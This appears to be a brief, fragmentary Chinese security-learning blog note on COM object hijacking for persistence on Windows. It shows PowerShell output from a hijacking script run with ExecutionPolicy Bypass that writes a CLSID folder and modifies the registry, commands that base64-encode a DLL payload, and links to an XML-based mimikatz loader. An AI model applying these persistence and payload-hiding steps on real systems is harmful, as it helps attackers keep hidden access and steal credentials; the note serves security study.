com_xml

enter description here

视频演示:

https://github.com/3gstudent/COM-Object-hijacking

不知不觉这条安全道路走快两年了,这博客记录我的学习记录,加油!

payload 加密

1
2
3
4
5
6
7
8
9
10
11
12
13
14
PS C:\Users\demon> powershell -ExecutionPolicy Bypass -File "C:\Users\demon\Desktop\COM Object hijacking persistence.ps1
"
[*] Searching Folder...
[+] Create Folder: C:\Users\demon\AppData\Roaming\Microsoft\Installer\
[+] Create Folder: C:\Users\demon\AppData\Roaming\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}
[*] Detecting operating system...
[+] OS: x64
[*] Releasing file...
[+] Done.
[*] Modifying registry...
[*] 64-bit:
[*] 32-bit:
[+] Done.
PS C:\Users\demon>

enter description here

1
2
PS C:\Users\demon> $fileContent = [System.IO.File]::ReadAllBytes('C:\Users\demon\Desktop\calcmutex.dll')
PS C:\Users\demon> $fileContentEncoded = [System.Convert]::ToBase64String($fileContent)| set-content ("123.txt")

http://www.4hou.com/technology/4958.html
https://github.com/3gstudent/test/blob/master/calcmutex.dll

enter description here

2.xml_mimikatz
https://gist.github.com/caseysmithrc/b1190e023cd29c1910c01a164675a22e
enter description here